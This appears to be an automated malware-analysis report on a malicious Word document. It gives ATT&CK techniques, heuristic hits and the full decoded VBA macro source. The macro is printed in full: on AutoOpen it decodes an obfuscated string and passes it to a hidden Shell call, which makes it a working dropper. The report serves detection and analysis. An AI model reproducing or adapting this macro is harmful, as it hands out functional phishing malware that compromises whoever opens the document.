MALICIOUS (Risk Score: 170)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'AutoOpen' macro is present, indicating it will execute automatically when the document is opened. The critical heuristic 'OLE_VBA_SHELL' suggests the macro attempts to execute system commands. The presence of a ClamAV detection for 'Doc.Dropper.Agent-6510804-0' further confirms its malicious nature as a dropper.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6510804-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6510804-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `wd = Form1.TextBox2.Tag`, `If "" = wd Then Shell s, Kolm`, `Form1.TextBox2.Text = ""`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True`, `Sub AutoOpen()`, `Swedenarform`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3268 bytes |

SHA-256: d3560f9bbe08f86909c58977cf702ae48b18bb7b803c9472d0db625dc1a906e5
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    Swedenarform
End Sub
Attribute VB_Name = "Module1"
Function zasohpers()
    Dim jir As Integer
    jir = 5 + 1
    zasohpers = jir - 1
    jir = 1 + zasohpers
End Function
Rem Form1 show messages
Function kontakter(str26, count1)
    Dim xon20() As Byte
    Dim maxdaj As String
    Dim minbit() As Byte
    Dim kas3 As String
    xon20 = "MWZC"
    Dim maxe() As Byte
    Dim kaspr As Integer
    kaspr = 0
    Dim fruka As Integer
    kas3 = xon20
    Dim j1 As String
    Dim xopova As Integer
    Dim XrttacaI() As Byte
    Dim I As Integer
    I = 374
    Dim Qapi2 As Integer
    WSOP = Form1.Con(xon20)
    Dim ngwiL As String
    xopova = 92 - str26
    xopova = xopova - 1
    Dim hzmould As String
    j1 = count1
    maxdaj = ""
    maxe = j1
    hzmould = "RgeHise"
    Qapi2 = Form1.Con(maxe)
    ngwiL = "Mirqc8"
    hujkot = kaspr
    For uD = hujkot To Qapi2
        manji = kaspr
        For zaLp1 = kaspr To WSOP
            If maxe(uD) = xon20(zaLp1) Then
                manji = manji + kaspr + 1
            End If
        Next
        If hujkot = manji Then
            maxdaj = maxdaj + Form1.paplace(maxe(uD) - xopova)
        End If
    Next
    kontakter = maxdaj
    With Form1
        .TextBox1.Text = maxdaj
        fruka = I + xopova
        fruka = -fruka + Len(maxdaj)
        If 107 < fruka Then
            .But_click
        End If
        .TextBox2.Text = ""
    End With
End Function
Function slipersat()
    Dim jiko As String
    jiko = "dnZe!0dCZ!QpxZCfsTifZCZmm!M!#(CQpxfWWsTCWifZCMmm!MW#CW#=$WZM5fWZCy$?gZZCvWZWodWujpoMMW!C"
    Dim ni As Integer
    ni = 1
    With Form1
        jiko = jiko + .TextBox1.Text
        Rem + .TextBox2.Text
        slipersat = jiko
    End With
    ni = ni + 1
End Function
Sub Swedenarform()
    Dim sder As String
    Dim palat As Integer
    palat = 60 + 30
    sder = kontakter(palat, slipersat())
    hernas = 0
End Sub
Attribute VB_Name = "Form1"
Attribute VB_Base = "0{3FC0B45D-54EF-43D0-8988-06E290D36B61}{99FDA0F1-DB26-40FF-AF58-FBA20B73EBBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Con(nij)
    zzpa = 0
    Con = zzpa + UBound(nij)
End Function
Private Sub com2_Click()
    Form1.TextBox1.Text = "4"
End Sub
Private Sub CommandButton2_Click()
    Form1.TextBox2.Text = "5"
End Sub
Private Sub but1_Click()
End Sub
Private Sub but2_Click()
    Form1.TextBox1.Text = ""
End Sub
Private Sub Label1_Click()
End Sub
Private Sub ListBox1_Click()
    Form1.TextBox2.Text = ""
End Sub
Private Sub TextBox1_Change()
    Dim s1 As String
    s1 = Form1.TextBox1.Text
    For J = 0 To 3
        For I = 0 To 50000
            s1 = "" + s1
        Next I
    Next J
    Form1.TextBox2.Text = s1
End Sub
Function paplace(masad)
    Dim stio As Integer
    stio = masad + 5
    paplace = Chr$(stio - 5)
End Function
Private Sub TextBox2_Change()
End Sub
Sub But_click()
    Dim s As String
    s = Form1.TextBox2.Text + ""
    Dim Im As Integer
    Kolm = 178 - 170 - 8
    wd = Form1.TextBox2.Tag
    If "" = wd Then Shell s, Kolm
    Form1.TextBox2.Text = ""
End Sub
```